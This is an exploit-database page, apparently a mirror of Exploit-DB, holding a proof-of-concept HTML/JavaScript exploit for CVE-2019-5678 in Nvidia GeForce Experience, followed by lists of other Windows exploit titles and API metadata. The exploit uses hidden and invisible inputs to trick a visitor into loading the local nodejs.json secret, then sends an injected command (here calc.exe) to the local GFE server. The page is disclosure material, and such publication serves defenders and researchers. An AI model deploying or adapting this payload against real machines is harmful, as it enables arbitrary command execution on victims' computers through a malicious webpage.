Menu

"Nvidia GeForce Experience Web Helper - Command Injection"

Author

"Rhino Security Labs"

Platform

windows

Release date

2019-06-03

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<!-- 
POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
 -->
<html>
   <head>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   </head>
   <body>
      <script>
         //Send request to local GFE server
          function submitRequest(port,secret)
          {
           var xhr = new XMLHttpRequest();
           xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
           xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
           xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
           xhr.setRequestHeader("Content-Type", "text\/html");
          xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
           var body = "\""+document.getElementById("cmd").value+"\"";
          var aBody = new Uint8Array(body.length);
           for (var i = 0; i < aBody.length; i++)
             aBody[i] = body.charCodeAt(i); 
           xhr.send(new Blob([aBody]));
          }
          
          $(document).on('change', '.file-upload-button', function(event) {
          var reader = new FileReader();
          
          reader.onload = function(event) {
          var jsonObj = JSON.parse(event.target.result);
          submitRequest(jsonObj.port,jsonObj.secret);
          }
          
          reader.readAsText(event.target.files[0]);
          });
          
          //Copy text from some text field
          function myFunction() {
          var copyText = document.getElementById("myInput");
          copyText.select();
          document.execCommand("copy");
          
          }
          
          //trigger the copy and file window on ctrl press
          $(document).keydown(function(keyPressed) {
          if (keyPressed.keyCode == 17) {
          myFunction();document.getElementById('file-input').click();
          }
          });
      </script>
      <h2>
         Press CTRL+V+Enter
      </h2>
      <!--Command to run in a hidden input field-->
      <input type="hidden" value="calc.exe" id="cmd" size="55">
      <!--Hidden text box to copy text from-->
      <div style="opacity: 0.0;">
         <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
            id="myInput" size="1">
      </div>
      <!--file input-->
      <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
   </body>
</html>
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
2019-07-18 "Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation" local windows "Google Security Research"
Release Date Title Type Platform Author
2019-06-03 "Nvidia GeForce Experience Web Helper - Command Injection" local windows "Rhino Security Labs"
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46972/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46972/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46972/41383/nvidia-geforce-experience-web-helper-command-injection/download/", "exploit_id": "46972", "exploit_description": "\"Nvidia GeForce Experience Web Helper - Command Injection\"", "exploit_date": "2019-06-03", "exploit_author": "\"Rhino Security Labs\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse